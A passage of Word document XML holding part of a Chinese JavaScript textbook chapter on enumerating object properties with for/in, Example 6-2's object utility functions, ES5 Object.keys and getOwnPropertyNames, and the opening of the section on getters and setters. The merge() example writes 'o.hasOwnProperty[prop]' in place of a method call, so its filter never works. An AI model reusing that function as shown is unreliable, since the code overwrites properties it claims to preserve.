        <w:t>遍历属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(p);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t>，不会输出</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有许多实用工具库给</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>添加了新的方法或属性，这些方法和属性可以被所有对象继承并使用。然而在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>标准之前，这些新添加的方法是不能定义为不可枚举的，因此它们</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>都可以在</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环中枚举出来。为了避免这种情况，需要过滤</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环返回的属性，下面两种</w:t>
      </w:r>
      <w:r>
        <w:t>方式是最常见的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(p in o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!o.hasOwnProperty(p))continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过继承的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(p in o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof o[p]==="function")continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过方法</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6-2</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一些有用的工具函数来操控对象的属性，这些函数用到了</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环。实际上</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>函数经常出现在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实用工具库中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>6-2</w:t>
      </w:r>
      <w:r>
        <w:t>：用来枚举属性的对象工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中的可枚举属性复制到</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中含有同名属性，则覆盖</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数并不处理</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>以及复制属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function extend(o,p){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(prop in p){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o[prop]=p[prop];//</w:t>
      </w:r>
      <w:r>
        <w:t>将属性添加至</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return o;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中的可枚举属性复制至</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中有同名的属性，</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性将不受影响</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数并不处理</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>以及复制属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function merge(o,p){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(prop i</w:t>
      </w:r>
      <w:r>
        <w:t>n p){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o.hasOwnProperty[prop])continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>过滤掉已经在</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中存在的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o[prop]=p[prop];//</w:t>
      </w:r>
      <w:r>
        <w:t>将属性添加至</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return o;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性在</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中没有同名属性，则从</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中删除这个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function restrict(o,p){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(prop in o){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!(prop in p))delete o[prop];//</w:t>
      </w:r>
      <w:r>
        <w:t>如果在</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中不存在，则删除之</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>o;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性在</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中存在同名属性，则从</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中删除这个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function subtract(o,p){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(prop in p){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete o[prop];//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中删除（删除一个不存在的属性不会报错）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return o;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个新对象，这个对象同时拥有</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性和</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中有重名属性，使用</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function union(o,p){return extend(extend({},o),p);}/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个新对象，这个对象拥有同时在</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中出现的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>很像求</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>的交集，但</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>中属性的值被忽略</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function intersection(o,p){return restrict(extend({},o),p);}/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个数组，这个数组包含的是</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中可枚举的自有属性的名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function keys(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof o!=="object")throw TypeError();//</w:t>
      </w:r>
      <w:r>
        <w:t>参数必须是对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var result=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>将要返回的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var prop i</w:t>
      </w:r>
      <w:r>
        <w:t>n o){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历所有可枚举的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o.hasOwnProperty(prop))//</w:t>
      </w:r>
      <w:r>
        <w:t>判断是否是自有属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>result.push(prop);//</w:t>
      </w:r>
      <w:r>
        <w:t>将属性名添加至数组中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return result;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回这个数组</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w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环之外，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了两个用以枚举属性名称的函数。第一个是</w:t>
      </w:r>
      <w:r>
        <w:t>Object.keys()</w:t>
      </w:r>
      <w:r>
        <w:t>，它返回一个数组，这个数组由对象中可枚举的自有属性的名称组成，它的工作原理和例</w:t>
      </w:r>
      <w:r>
        <w:t>6-2</w:t>
      </w:r>
      <w:r>
        <w:t>中的工具函数</w:t>
      </w:r>
      <w:r>
        <w:t>keys()</w:t>
      </w:r>
      <w:r>
        <w:t>类似。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>中第二个枚举属性的函数是</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyNames()</w:t>
      </w:r>
      <w:r>
        <w:t>，它和</w:t>
      </w:r>
      <w:r>
        <w:t>Ojbect.keys()</w:t>
      </w:r>
      <w:r>
        <w:t>类似，只是它返回对象的所有自有属性的名称，而不仅仅是可枚举的属性。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中是无法实现的类似的函数的，因为</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中没有提供任何方法来获取对象不可枚举的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="6_6_Shu_Xing_getterHe_setter"/>
      <w:r>
        <w:t>6.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　属性</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们知道，对象属性是由名字、值和一组特性（</w:t>
      </w:r>
      <w:r>
        <w:t>attribute</w:t>
      </w:r>
      <w:r>
        <w:t>）构成的。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>中，属性值可以用一个或两个方法替代，这两个方法就是</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>。由</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>定义的属性称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>存取器属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>accessor property</w:t>
      </w:r>
      <w:r>
        <w:t>），它不同于</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>数据属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>data property</w:t>
      </w:r>
      <w:r>
        <w:t>），数据属性只有一个简单的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当程序查询存取器属性的值时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>方法（无参数）。这个方法的返回值就是属性存取表达式的值。当程序设置一个存取器属性的值时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法，将赋值表达式右侧的值当做参数传入</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>。从某种意义上讲，这个方法负责</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>属性值。可以忽略</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回值。</w:t>
      </w:r>
    </w:p>
